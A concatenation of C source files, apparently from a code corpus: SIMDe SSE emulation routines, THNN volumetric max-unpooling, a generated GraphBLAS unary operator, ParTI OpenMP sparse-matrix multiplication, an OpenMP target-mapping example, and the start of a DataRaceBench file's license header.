int simde_mm_ucomige_ss(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_ucomige_ss(a, b);
#else
simde__m128_private a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
int r;
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
uint32x4_t a_not_nan = vceqq_f32(a_.neon_f32, a_.neon_f32);
uint32x4_t b_not_nan = vceqq_f32(b_.neon_f32, b_.neon_f32);
uint32x4_t a_and_b_not_nan = vandq_u32(a_not_nan, b_not_nan);
uint32x4_t a_ge_b = vcgeq_f32(a_.neon_f32, b_.neon_f32);
r = !!(vgetq_lane_u32(vandq_u32(a_and_b_not_nan, a_ge_b), 0) != 0);
#elif defined(SIMDE_HAVE_FENV_H)
fenv_t envp;
int x = feholdexcept(&envp);
r = a_.f32[0] >= b_.f32[0];
if (HEDLEY_LIKELY(x == 0))
fesetenv(&envp);
#else
r = a_.f32[0] >= b_.f32[0];
#endif
return r;
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_ucomige_ss(a, b) simde_mm_ucomige_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
int simde_mm_ucomigt_ss(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_ucomigt_ss(a, b);
#else
simde__m128_private a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
int r;
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
uint32x4_t a_not_nan = vceqq_f32(a_.neon_f32, a_.neon_f32);
uint32x4_t b_not_nan = vceqq_f32(b_.neon_f32, b_.neon_f32);
uint32x4_t a_and_b_not_nan = vandq_u32(a_not_nan, b_not_nan);
uint32x4_t a_gt_b = vcgtq_f32(a_.neon_f32, b_.neon_f32);
r = !!(vgetq_lane_u32(vandq_u32(a_and_b_not_nan, a_gt_b), 0) != 0);
#elif defined(SIMDE_HAVE_FENV_H)
fenv_t envp;
int x = feholdexcept(&envp);
r = a_.f32[0] > b_.f32[0];
if (HEDLEY_LIKELY(x == 0))
fesetenv(&envp);
#else
r = a_.f32[0] > b_.f32[0];
#endif
return r;
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_ucomigt_ss(a, b) simde_mm_ucomigt_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
int simde_mm_ucomile_ss(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_ucomile_ss(a, b);
#else
simde__m128_private a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
int r;
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
uint32x4_t a_not_nan = vceqq_f32(a_.neon_f32, a_.neon_f32);
uint32x4_t b_not_nan = vceqq_f32(b_.neon_f32, b_.neon_f32);
uint32x4_t a_or_b_nan = vmvnq_u32(vandq_u32(a_not_nan, b_not_nan));
uint32x4_t a_le_b = vcleq_f32(a_.neon_f32, b_.neon_f32);
r = !!(vgetq_lane_u32(vorrq_u32(a_or_b_nan, a_le_b), 0) != 0);
#elif defined(SIMDE_HAVE_FENV_H)
fenv_t envp;
int x = feholdexcept(&envp);
r = a_.f32[0] <= b_.f32[0];
if (HEDLEY_LIKELY(x == 0))
fesetenv(&envp);
#else
r = a_.f32[0] <= b_.f32[0];
#endif
return r;
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_ucomile_ss(a, b) simde_mm_ucomile_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
int simde_mm_ucomilt_ss(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_ucomilt_ss(a, b);
#else
simde__m128_private a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
int r;
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
uint32x4_t a_not_nan = vceqq_f32(a_.neon_f32, a_.neon_f32);
uint32x4_t b_not_nan = vceqq_f32(b_.neon_f32, b_.neon_f32);
uint32x4_t a_or_b_nan = vmvnq_u32(vandq_u32(a_not_nan, b_not_nan));
uint32x4_t a_lt_b = vcltq_f32(a_.neon_f32, b_.neon_f32);
r = !!(vgetq_lane_u32(vorrq_u32(a_or_b_nan, a_lt_b), 0) != 0);
#elif defined(SIMDE_HAVE_FENV_H)
fenv_t envp;
int x = feholdexcept(&envp);
r = a_.f32[0] < b_.f32[0];
if (HEDLEY_LIKELY(x == 0))
fesetenv(&envp);
#else
r = a_.f32[0] < b_.f32[0];
#endif
return r;
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_ucomilt_ss(a, b) simde_mm_ucomilt_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
int simde_mm_ucomineq_ss(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_ucomineq_ss(a, b);
#else
simde__m128_private a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
int r;
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
uint32x4_t a_not_nan = vceqq_f32(a_.neon_f32, a_.neon_f32);
uint32x4_t b_not_nan = vceqq_f32(b_.neon_f32, b_.neon_f32);
uint32x4_t a_and_b_not_nan = vandq_u32(a_not_nan, b_not_nan);
uint32x4_t a_neq_b = vmvnq_u32(vceqq_f32(a_.neon_f32, b_.neon_f32));
r = !!(vgetq_lane_u32(vandq_u32(a_and_b_not_nan, a_neq_b), 0) != 0);
#elif defined(SIMDE_HAVE_FENV_H)
fenv_t envp;
int x = feholdexcept(&envp);
r = a_.f32[0] != b_.f32[0];
if (HEDLEY_LIKELY(x == 0))
fesetenv(&envp);
#else
r = a_.f32[0] != b_.f32[0];
#endif
return r;
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_ucomineq_ss(a, b) simde_mm_ucomineq_ss((a), (b))
#endif
#if defined(SIMDE_X86_SSE_NATIVE)
#if defined(__has_builtin)
#if __has_builtin(__builtin_ia32_undef128)
#define SIMDE_HAVE_UNDEFINED128
#endif
#elif !defined(__PGI) && !defined(SIMDE_BUG_GCC_REV_208793) && \
!defined(_MSC_VER)
#define SIMDE_HAVE_UNDEFINED128
#endif
#endif
#if defined(SIMDE_DIAGNOSTIC_DISABLE_UNINITIALIZED_)
HEDLEY_DIAGNOSTIC_PUSH
SIMDE_DIAGNOSTIC_DISABLE_UNINITIALIZED_
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_unpackhi_ps(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_unpackhi_ps(a, b);
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A64V8_NATIVE)
r_.neon_f32 = vzip2q_f32(a_.neon_f32, b_.neon_f32);
#elif defined(SIMDE_ARM_NEON_A32V7_NATIVE)
float32x2_t a1 = vget_high_f32(a_.neon_f32);
float32x2_t b1 = vget_high_f32(b_.neon_f32);
float32x2x2_t result = vzip_f32(a1, b1);
r_.neon_f32 = vcombine_f32(result.val[0], result.val[1]);
#elif defined(SIMDE_SHUFFLE_VECTOR_)
r_.f32 = SIMDE_SHUFFLE_VECTOR_(32, 16, a_.f32, b_.f32, 2, 6, 3, 7);
#else
r_.f32[0] = a_.f32[2];
r_.f32[1] = b_.f32[2];
r_.f32[2] = a_.f32[3];
r_.f32[3] = b_.f32[3];
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_unpackhi_ps(a, b) simde_mm_unpackhi_ps((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_unpacklo_ps(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_unpacklo_ps(a, b);
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A64V8_NATIVE)
r_.neon_f32 = vzip1q_f32(a_.neon_f32, b_.neon_f32);
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
r_.altivec_f32 = vec_mergeh(a_.altivec_f32, b_.altivec_f32);
#elif defined(SIMDE_SHUFFLE_VECTOR_)
r_.f32 = SIMDE_SHUFFLE_VECTOR_(32, 16, a_.f32, b_.f32, 0, 4, 1, 5);
#elif defined(SIMDE_ARM_NEON_A32V7_NATIVE)
float32x2_t a1 = vget_low_f32(a_.neon_f32);
float32x2_t b1 = vget_low_f32(b_.neon_f32);
float32x2x2_t result = vzip_f32(a1, b1);
r_.neon_f32 = vcombine_f32(result.val[0], result.val[1]);
#else
r_.f32[0] = a_.f32[0];
r_.f32[1] = b_.f32[0];
r_.f32[2] = a_.f32[1];
r_.f32[3] = b_.f32[1];
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_unpacklo_ps(a, b) simde_mm_unpacklo_ps((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
void simde_mm_stream_pi(simde__m64 *mem_addr, simde__m64 a)
{
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_X86_MMX_NATIVE)
_mm_stream_pi(HEDLEY_REINTERPRET_CAST(__m64 *, mem_addr), a);
#else
simde__m64_private *dest = HEDLEY_REINTERPRET_CAST(simde__m64_private *,
mem_addr),
a_ = simde__m64_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
dest->i64[0] = vget_lane_s64(a_.neon_i64, 0);
#else
dest->i64[0] = a_.i64[0];
#endif
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_stream_pi(mem_addr, a) simde_mm_stream_pi(mem_addr, (a))
#endif
SIMDE_FUNCTION_ATTRIBUTES
void simde_mm_stream_ps(simde_float32 mem_addr[4], simde__m128 a)
{
#if defined(SIMDE_X86_SSE_NATIVE)
_mm_stream_ps(mem_addr, a);
#elif HEDLEY_HAS_BUILTIN(__builtin_nontemporal_store) && \
defined(SIMDE_VECTOR_SUBSCRIPT_OPS)
simde__m128_private a_ = simde__m128_to_private(a);
__builtin_nontemporal_store(
a_.f32, SIMDE_ALIGN_CAST(__typeof__(a_.f32) *, mem_addr));
#else
simde_mm_store_ps(mem_addr, a);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_stream_ps(mem_addr, a) \
simde_mm_stream_ps(SIMDE_CHECKED_REINTERPRET_CAST( \
float *, simde_float32 *, mem_addr), \
(a))
#endif
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
#define SIMDE_MM_TRANSPOSE4_PS(row0, row1, row2, row3) \
do { \
float32x4x2_t ROW01 = vtrnq_f32(row0, row1); \
float32x4x2_t ROW23 = vtrnq_f32(row2, row3); \
row0 = vcombine_f32(vget_low_f32(ROW01.val[0]), \
vget_low_f32(ROW23.val[0])); \
row1 = vcombine_f32(vget_low_f32(ROW01.val[1]), \
vget_low_f32(ROW23.val[1])); \
row2 = vcombine_f32(vget_high_f32(ROW01.val[0]), \
vget_high_f32(ROW23.val[0])); \
row3 = vcombine_f32(vget_high_f32(ROW01.val[1]), \
vget_high_f32(ROW23.val[1])); \
} while (0)
#else
#define SIMDE_MM_TRANSPOSE4_PS(row0, row1, row2, row3) \
do { \
simde__m128 tmp3, tmp2, tmp1, tmp0; \
tmp0 = simde_mm_unpacklo_ps((row0), (row1)); \
tmp2 = simde_mm_unpacklo_ps((row2), (row3)); \
tmp1 = simde_mm_unpackhi_ps((row0), (row1)); \
tmp3 = simde_mm_unpackhi_ps((row2), (row3)); \
row0 = simde_mm_movelh_ps(tmp0, tmp2); \
row1 = simde_mm_movehl_ps(tmp2, tmp0); \
row2 = simde_mm_movelh_ps(tmp1, tmp3); \
row3 = simde_mm_movehl_ps(tmp3, tmp1); \
} while (0)
#endif
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _MM_TRANSPOSE4_PS(row0, row1, row2, row3) \
SIMDE_MM_TRANSPOSE4_PS(row0, row1, row2, row3)
#endif
#if defined(_MM_EXCEPT_INVALID)
#define SIMDE_MM_EXCEPT_INVALID _MM_EXCEPT_INVALID
#else
#define SIMDE_MM_EXCEPT_INVALID (0x0001)
#endif
#if defined(_MM_EXCEPT_DENORM)
#define SIMDE_MM_EXCEPT_DENORM _MM_EXCEPT_DENORM
#else
#define SIMDE_MM_EXCEPT_DENORM (0x0002)
#endif
#if defined(_MM_EXCEPT_DIV_ZERO)
#define SIMDE_MM_EXCEPT_DIV_ZERO _MM_EXCEPT_DIV_ZERO
#else
#define SIMDE_MM_EXCEPT_DIV_ZERO (0x0004)
#endif
#if defined(_MM_EXCEPT_OVERFLOW)
#define SIMDE_MM_EXCEPT_OVERFLOW _MM_EXCEPT_OVERFLOW
#else
#define SIMDE_MM_EXCEPT_OVERFLOW (0x0008)
#endif
#if defined(_MM_EXCEPT_UNDERFLOW)
#define SIMDE_MM_EXCEPT_UNDERFLOW _MM_EXCEPT_UNDERFLOW
#else
#define SIMDE_MM_EXCEPT_UNDERFLOW (0x0010)
#endif
#if defined(_MM_EXCEPT_INEXACT)
#define SIMDE_MM_EXCEPT_INEXACT _MM_EXCEPT_INEXACT
#else
#define SIMDE_MM_EXCEPT_INEXACT (0x0020)
#endif
#if defined(_MM_EXCEPT_MASK)
#define SIMDE_MM_EXCEPT_MASK _MM_EXCEPT_MASK
#else
#define SIMDE_MM_EXCEPT_MASK \
(SIMDE_MM_EXCEPT_INVALID | SIMDE_MM_EXCEPT_DENORM | \
SIMDE_MM_EXCEPT_DIV_ZERO | SIMDE_MM_EXCEPT_OVERFLOW | \
SIMDE_MM_EXCEPT_UNDERFLOW | SIMDE_MM_EXCEPT_INEXACT)
#endif
#if defined(_MM_MASK_INVALID)
#define SIMDE_MM_MASK_INVALID _MM_MASK_INVALID
#else
#define SIMDE_MM_MASK_INVALID (0x0080)
#endif
#if defined(_MM_MASK_DENORM)
#define SIMDE_MM_MASK_DENORM _MM_MASK_DENORM
#else
#define SIMDE_MM_MASK_DENORM (0x0100)
#endif
#if defined(_MM_MASK_DIV_ZERO)
#define SIMDE_MM_MASK_DIV_ZERO _MM_MASK_DIV_ZERO
#else
#define SIMDE_MM_MASK_DIV_ZERO (0x0200)
#endif
#if defined(_MM_MASK_OVERFLOW)
#define SIMDE_MM_MASK_OVERFLOW _MM_MASK_OVERFLOW
#else
#define SIMDE_MM_MASK_OVERFLOW (0x0400)
#endif
#if defined(_MM_MASK_UNDERFLOW)
#define SIMDE_MM_MASK_UNDERFLOW _MM_MASK_UNDERFLOW
#else
#define SIMDE_MM_MASK_UNDERFLOW (0x0800)
#endif
#if defined(_MM_MASK_INEXACT)
#define SIMDE_MM_MASK_INEXACT _MM_MASK_INEXACT
#else
#define SIMDE_MM_MASK_INEXACT (0x1000)
#endif
#if defined(_MM_MASK_MASK)
#define SIMDE_MM_MASK_MASK _MM_MASK_MASK
#else
#define SIMDE_MM_MASK_MASK \
(SIMDE_MM_MASK_INVALID | SIMDE_MM_MASK_DENORM | \
SIMDE_MM_MASK_DIV_ZERO | SIMDE_MM_MASK_OVERFLOW | \
SIMDE_MM_MASK_UNDERFLOW | SIMDE_MM_MASK_INEXACT)
#endif
#if defined(_MM_FLUSH_ZERO_MASK)
#define SIMDE_MM_FLUSH_ZERO_MASK _MM_FLUSH_ZERO_MASK
#else
#define SIMDE_MM_FLUSH_ZERO_MASK (0x8000)
#endif
#if defined(_MM_FLUSH_ZERO_ON)
#define SIMDE_MM_FLUSH_ZERO_ON _MM_FLUSH_ZERO_ON
#else
#define SIMDE_MM_FLUSH_ZERO_ON (0x8000)
#endif
#if defined(_MM_FLUSH_ZERO_OFF)
#define SIMDE_MM_FLUSH_ZERO_OFF _MM_FLUSH_ZERO_OFF
#else
#define SIMDE_MM_FLUSH_ZERO_OFF (0x0000)
#endif
SIMDE_END_DECLS_
HEDLEY_DIAGNOSTIC_POP
#endif /* !defined(SIMDE_X86_SSE_H) */
|
VolumetricMaxUnpooling.c | #ifndef TH_GENERIC_FILE
#define TH_GENERIC_FILE "THNN/generic/VolumetricMaxUnpooling.c"
#else
static inline void THNN_(VolumetricMaxUnpooling_shapeCheck)(
THNNState *state,
THTensor *input,
THTensor *gradOutput,
THIndexTensor *indices,
int oT,
int oW,
int oH,
int dT,
int dW,
int dH,
int pT,
int pW,
int pH)
{
THNN_ARGCHECK(!input->is_empty() && (input->dim() == 4 || input->dim() == 5), 2, input,
"non-empty 4D or 5D (batch mode) tensor expected for input, but got: %s");
THNN_CHECK_SHAPE_INDICES(input, indices);
THArgCheck(dT > 0 && dW > 0 && dH > 0, 10,
"stride should be greater than zero, but got dT: %d dH: %d dW: %d",
dT, dH, dW);
int dimw = 3;
int dimh = 2;
int dimt = 1;
int dimn = 0;
if (input->dim() == 5)
{
dimt++;
dimw++;
dimh++;
dimn++;
}
int nslices = input->size(dimn);
if (gradOutput != NULL) {
if (oT != gradOutput->size(dimt) || oW != gradOutput->size(dimw) || oH != gradOutput->size(dimh))
{
THError(
"Inconsistent gradOutput size. oT= %d, oH= %d, oW= %d, gradOutput: %dx%dx%d",
oT, oH, oW, gradOutput->size(dimt), gradOutput->size(dimh), gradOutput->size(dimw)
);
}
THNN_CHECK_DIM_SIZE(gradOutput, input->dim(), dimn, nslices);
}
}
static void THNN_(VolumetricMaxUnpooling_updateOutput_frame)(
scalar_t *input_p,
scalar_t *output_p,
THIndex_t *ind_p,
int nslices,
int iT,
int iW,
int iH,
int oT,
int oW,
int oH)
{
int k;
int has_error = 0;
THIndex_t error_index = 0;
#pragma omp parallel for private(k)
for (k = 0; k < nslices; k++)
{
scalar_t *output_p_k = output_p + k * oT * oH * oW;
scalar_t *input_p_k = input_p + k * iT * iH * iW;
THIndex_t *ind_p_k = ind_p + k * iT * iH * iW;
int t, i, j, index;
THIndex_t maxp;
for (t = 0; t < iT; t++)
{
for (i = 0; i < iH; i++)
{
for (j = 0; j < iW; j++)
{
index = t * iH * iW + i * iW + j;
maxp = ind_p_k[index]; /* retrieve position of max */
if (maxp < 0 || maxp >= oT * oW * oH)
{
#pragma omp critical
{
has_error = 1;
error_index = maxp;
}
} else {
output_p_k[maxp] = input_p_k[index]; /* update output */
}
}
}
}
}
if (has_error) {
THError(
"found an invalid max index %ld (output volumes are of size %dx%dx%d)",
error_index, oT, oH, oW
);
}
}
void THNN_(VolumetricMaxUnpooling_updateOutput)(
THNNState *state,
THTensor *input,
THTensor *output,
THIndexTensor *indices,
int oT,
int oW,
int oH,
int dT,
int dW,
int dH,
int pT,
int pW,
int pH)
{
int dimw = 3;
int dimh = 2;
int dimt = 1;
int nbatch = 1;
int nslices;
int iT;
int iH;
int iW;
scalar_t *input_data;
scalar_t *output_data;
THIndex_t *indices_data;
THNN_(VolumetricMaxUnpooling_shapeCheck)(
state, input, NULL, indices,
oT, oW, oH, dT, dW, dH, pT, pW, pH);
if (input->dim() == 5)
{
nbatch = input->size(0);
dimt++;
dimw++;
dimh++;
}
/* sizes */
nslices = input->size(dimt-1);
iT = input->size(dimt);
iH = input->size(dimh);
iW = input->size(dimw);
/* get contiguous input */
input = THTensor_(newContiguous)(input);
indices = THIndexTensor_(newContiguous)(indices);
/* resize output */
if (input->dim() == 4)
{
THTensor_(resize4d)(output, nslices, oT, oH, oW);
THTensor_(zero)(output);
input_data = input->data<scalar_t>();
output_data = output->data<scalar_t>();
indices_data = THIndexTensor_(data)(indices);
THNN_(VolumetricMaxUnpooling_updateOutput_frame)(
input_data, output_data,
indices_data,
nslices,
iT, iW, iH,
oT, oW, oH
);
}
else
{
int p;
THTensor_(resize5d)(output, nbatch, nslices, oT, oH, oW);
THTensor_(zero)(output);
input_data = input->data<scalar_t>();
output_data = output->data<scalar_t>();
indices_data = THIndexTensor_(data)(indices);
for (p = 0; p < nbatch; p++)
{
THNN_(VolumetricMaxUnpooling_updateOutput_frame)(
input_data+p*nslices*iT*iW*iH,
output_data+p*nslices*oT*oW*oH,
indices_data+p*nslices*iT*iW*iH,
nslices,
iT, iW, iH,
oT, oW, oH
);
}
}
/* cleanup */
c10::raw::intrusive_ptr::decref(input);
THIndexTensor_(free)(indices);
}
static void THNN_(VolumetricMaxUnpooling_updateGradInput_frame)(
scalar_t *gradInput_p,
scalar_t *gradOutput_p,
THIndex_t *ind_p,
int nslices,
int iT,
int iW,
int iH,
int oT,
int oW,
int oH)
{
int k;
#pragma omp parallel for private(k)
for (k = 0; k < nslices; k++)
{
scalar_t *gradInput_p_k = gradInput_p + k * iT * iH * iW;
scalar_t *gradOutput_p_k = gradOutput_p + k * oT * oH * oW;
THIndex_t *ind_p_k = ind_p + k * iT * iH * iW;
int t, i, j, index;
THIndex_t maxp;
for (t = 0; t < iT; t++)
{
for (i = 0; i < iH; i++)
{
for (j = 0; j < iW; j++)
{
index = t * iH * iW + i * iW + j;
maxp = ind_p_k[index]; /* retrieve position of max */
if (maxp < 0 || maxp >= oT * oH * oW)
{
THError("invalid max index %ld, oT= %d, oW= %d, oH= %d", maxp, oT, oW, oH);
}
gradInput_p_k[index] = gradOutput_p_k[maxp]; /* update gradient */
}
}
}
}
}
void THNN_(VolumetricMaxUnpooling_updateGradInput)(
THNNState *state,
THTensor *input,
THTensor *gradOutput,
THTensor *gradInput,
THIndexTensor *indices,
int oT,
int oW,
int oH,
int dT,
int dW,
int dH,
int pT,
int pW,
int pH)
{
int dimw = 3;
int dimh = 2;
int dimt = 1;
int nbatch = 1;
int nslices;
int iT;
int iH;
int iW;
scalar_t *gradInput_data;
scalar_t *gradOutput_data;
THIndex_t *indices_data;
THNN_(VolumetricMaxUnpooling_shapeCheck)(
state, input, gradOutput, indices,
oT, oW, oH, dT, dW, dH, pT, pW, pH);
// TODO: check gradOutput shape
/* get contiguous gradOutput */
gradOutput = THTensor_(newContiguous)(gradOutput);
indices = THIndexTensor_(newContiguous)(indices);
/* resize */
THTensor_(resizeAs)(gradInput, input);
THTensor_(zero)(gradInput);
if (input->dim() == 5)
{
nbatch = input->size(0);
dimt++;
dimw++;
dimh++;
}
/* sizes */
nslices = input->size(dimt-1);
iT = input->size(dimt);
iH = input->size(dimh);
iW = input->size(dimw);
/* get raw pointers */
gradInput_data = gradInput->data<scalar_t>();
gradOutput_data = gradOutput->data<scalar_t>();
indices_data = THIndexTensor_(data)(indices);
/* backprop */
if (input->dim() == 4)
{
THNN_(VolumetricMaxUnpooling_updateGradInput_frame)(
gradInput_data, gradOutput_data,
indices_data,
nslices,
iT, iW, iH,
oT, oW, oH
);
}
else
{
int p;
for (p = 0; p < nbatch; p++)
{
THNN_(VolumetricMaxUnpooling_updateGradInput_frame)(
gradInput_data+p*nslices*iT*iW*iH,
gradOutput_data+p*nslices*oT*oW*oH,
indices_data+p*nslices*iT*iW*iH,
nslices,
iT, iW, iH,
oT, oW, oH
);
}
}
/* cleanup */
c10::raw::intrusive_ptr::decref(gradOutput);
THIndexTensor_(free)(indices);
}
#endif
|
GB_unaryop__abs_uint64_bool.c | //------------------------------------------------------------------------------
// GB_unaryop: hard-coded functions for each built-in unary operator
//------------------------------------------------------------------------------
// SuiteSparse:GraphBLAS, Timothy A. Davis, (c) 2017-2019, All Rights Reserved.
// http://suitesparse.com See GraphBLAS/Doc/License.txt for license.
//------------------------------------------------------------------------------
// If this file is in the Generated/ folder, do not edit it (auto-generated).
#include "GB.h"
#ifndef GBCOMPACT
#include "GB_control.h"
#include "GB_iterator.h"
#include "GB_unaryop__include.h"
// C=unop(A) is defined by the following types and operators:
// op(A) function: GB_unop__abs_uint64_bool
// op(A') function: GB_tran__abs_uint64_bool
// C type: uint64_t
// A type: bool
// cast: uint64_t cij = (uint64_t) aij
// unaryop: cij = aij
#define GB_ATYPE \
bool
#define GB_CTYPE \
uint64_t
// aij = Ax [pA]
#define GB_GETA(aij,Ax,pA) \
bool aij = Ax [pA]
#define GB_CX(p) Cx [p]
// unary operator
#define GB_OP(z, x) \
z = x ;
// casting
#define GB_CASTING(z, x) \
uint64_t z = (uint64_t) x ;
// cij = op (cast (aij))
#define GB_CAST_OP(pC,pA) \
{ \
/* aij = Ax [pA] */ \
GB_GETA (aij, Ax, pA) ; \
/* Cx [pC] = op (cast (aij)) */ \
GB_CASTING (x, aij) ; \
GB_OP (GB_CX (pC), x) ; \
}
// disable this operator and use the generic case if these conditions hold
#define GB_DISABLE \
(GxB_NO_ABS || GxB_NO_UINT64 || GxB_NO_BOOL)
//------------------------------------------------------------------------------
// Cx = op (cast (Ax)): apply a unary operator
//------------------------------------------------------------------------------
GrB_Info GB_unop__abs_uint64_bool
(
uint64_t *restrict Cx,
const bool *restrict Ax,
int64_t anz,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (int64_t p = 0 ; p < anz ; p++)
{
GB_CAST_OP (p, p) ;
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C = op (cast (A')): transpose, typecast, and apply a unary operator
//------------------------------------------------------------------------------
GrB_Info GB_tran__abs_uint64_bool
(
GrB_Matrix C,
const GrB_Matrix A,
int64_t *restrict *Rowcounts,
GBI_single_iterator Iter,
const int64_t *restrict A_slice,
int naslice
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#define GB_PHASE_2_OF_2
#include "GB_unaryop_transpose.c"
return (GrB_SUCCESS) ;
#endif
}
#endif
|
mmul.c | /*
This file is part of ParTI!.
ParTI! is free software: you can redistribute it and/or modify
it under the terms of the GNU Lesser General Public License as
published by the Free Software Foundation, either version 3 of
the License, or (at your option) any later version.
ParTI! is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with ParTI!.
If not, see <http://www.gnu.org/licenses/>.
*/
#include <HiParTI.h>
#include <stdio.h>
/**
* SpMM, C = AB, A is sparse, B, C are dense
*/
int ptiSparseMatrixMulMatrix(ptiMatrix * C, const ptiSparseMatrix *spA, ptiMatrix * B)
{
for(ptiNnzIndex z = 0; z < spA->nnz; ++z) {
ptiIndex row = spA->rowind.data[z]; // C[row,:]
ptiIndex col = spA->colind.data[z]; // B[col,:]
ptiValue val = spA->values.data[z];
for(ptiNnzIndex c = 0; c < B->ncols; ++c) {
C->values[row * C->stride + c] += val * B->values[col * B->stride + c];
}
}
return 0;
}
#ifdef HIPARTI_USE_OPENMP
int ptiOmpSparseMatrixMulMatrix(ptiMatrix * C, const ptiSparseMatrix *spA, ptiMatrix * B)
{
#pragma omp parallel for // schedule(static)
for(ptiNnzIndex z = 0; z < spA->nnz; ++z) {
ptiIndex row = spA->rowind.data[z]; // C[row,:]
ptiIndex col = spA->colind.data[z]; // B[col,:]
ptiValue val = spA->values.data[z];
ptiValue * restrict cval_row = C->values + row * C->stride;
for(ptiIndex c = 0; c < B->ncols; ++c) {
#pragma omp atomic update
cval_row[c] += val * B->values[col * B->stride + c];
// C->values[row * C->stride+c] += val * B->values[col * B->stride + c]; // slower
}
}
return 0;
}
int ptiOmpSparseMatrixMulMatrix_Reduce(ptiMatrix * C, ptiMatrix * Cbufs, const ptiSparseMatrix *spA, ptiMatrix * B)
{
int nthreads;
#pragma omp parallel
nthreads = omp_get_num_threads();
#pragma omp parallel for // schedule(static)
for(ptiNnzIndex z = 0; z < spA->nnz; ++z) {
int tid = omp_get_thread_num();
ptiIndex row = spA->rowind.data[z]; // C[row,:]
ptiIndex col = spA->colind.data[z]; // B[col,:]
ptiValue val = spA->values.data[z];
#pragma omp simd
for(ptiIndex c = 0; c < B->ncols; ++c) {
Cbufs[tid].values[row * C->stride + c] += val * B->values[col * B->stride + c]; // slower
}
}
/* Reduction */
#pragma omp parallel for schedule(static)
for(ptiIndex r=0; r<C->nrows; ++r) {
for(int t=0; t<nthreads; ++t) {
#pragma omp simd
for(ptiIndex c = 0; c < C->ncols; ++c) {
C->values[r * C->stride + c] += Cbufs[t].values[r * C->stride + c];
}
}
}
return 0;
}
#endif
|
Example_target_ptr_map.3b.c | /*
* @@name: target_ptr_map.3b.c
* @@type: C
* @@compilable: yes
* @@linkable: no
* @@expect: success
* @@version: omp_5.0
*/
#define N 100
int x[N], y[N];
#pragma omp declare target
int *p1;
#pragma omp end declare target
int *p2;
int foo()
{
p1 = &x[0];
p2 = &y[0];
// Explicitly map array section y[:N]
#pragma omp target enter data map(y[:N])
#pragma omp target map(x[:N]) map(p1[:N]) map(p2[:0])
{
// Accessing the mapped arrays x,y is OK here.
x[0] = 1;
y[1] = 2;
// Pointer attachment for p1 occurs here when array x is mapped
// on the target construct (as p1 = &x[0] on the device)
p1[0] = 3; // accessing p1 is OK
// p2 in the target region is initialized to &y[0]
p2[1] = 4; // accessing p2 is OK
}
return 0;
}
|
DRB097-target-teams-distribute-orig-no.c | /*
Copyright (c) 2017, Lawrence Livermore National Security, LLC.
Produced at the Lawrence Livermore National Laboratory
Written by Chunhua Liao, Pei-Hung Lin, Joshua Asplund,
Markus Schordan, and Ian Karlin
(email: liao6@llnl.gov, lin32@llnl.gov, asplund1@llnl.gov,
schordan1@llnl.gov, karlin1@llnl.gov)
LLNL-CODE-732144
All rights reserved.
This file is part of DataRaceBench. For details, see
https://github.com/LLNL/dataracebench. Please also see the LICENSE file
for our additional BSD notice.
